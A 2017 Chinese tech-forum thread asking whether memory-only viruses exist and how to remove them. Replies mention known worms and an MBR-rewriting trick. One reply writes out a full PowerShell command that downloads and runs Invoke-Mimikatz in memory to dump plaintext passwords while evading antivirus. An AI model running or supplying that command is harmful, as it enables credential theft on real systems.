这是一个创建于 2627 天前的主题,其中的信息可能已经有所发展或是发生改变。
不知道有没存在于内存中的病毒,如果有怎么样清楚呢?
不知道有没有人遇到过?
 |
1
UnisandK 2017-08-30 17:32:11 +08:00
拔电源
|
 |
2
ZakaryTime 2017-08-30 18:11:29 +08:00 via Android
这种病毒的意义在哪?存活概率为 0
|
 |
3
leloext 2017-08-30 18:32:56 +08:00
Worm.NetKiller2003 就是内存病毒,无生成文件。
|
 |
4
ic2y 2017-08-30 19:18:36 +08:00  1
有这种毒。忘记叫什么了。 平时运行在内存,无文件,劫持关机操作,关机前的最后时刻,备份 MBR 引导,写入恶意 MBR,写入恶意程序。一旦开机运行,从 MBR 启动起来之后,立刻恢复正常 MRB,删除恶意程序。。
巧妙利用关机前,杀毒软件已经退出的间隙。 |
 |
5
anoymoux 2017-08-30 19:30:33 +08:00
举个例子:Mimikatz 获取明文密码,如果直接下载执行会被杀软删除,用下面的命令就可以在内存中执行,无文件产生
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m" |
 |
7
claysec 2017-08-30 19:42:00 +08:00
把 windows 系统刷进内存你就是无敌的金刚之身了。
|
 |
8
yksoft1 2017-08-30 20:04:08 +08:00
你说的内存条 SPD 里藏恶意代码,攻击 BIOS/EFI 之类?这个倒真的可以考虑一下。
一个病毒只存在于 RAM 中也是可以起到攻击作用的,至少完全可以盗取隐私机密数据。 |
 |
9
am241 2017-08-30 20:17:53 +08:00 via Android
SQL slammer
|
Select Language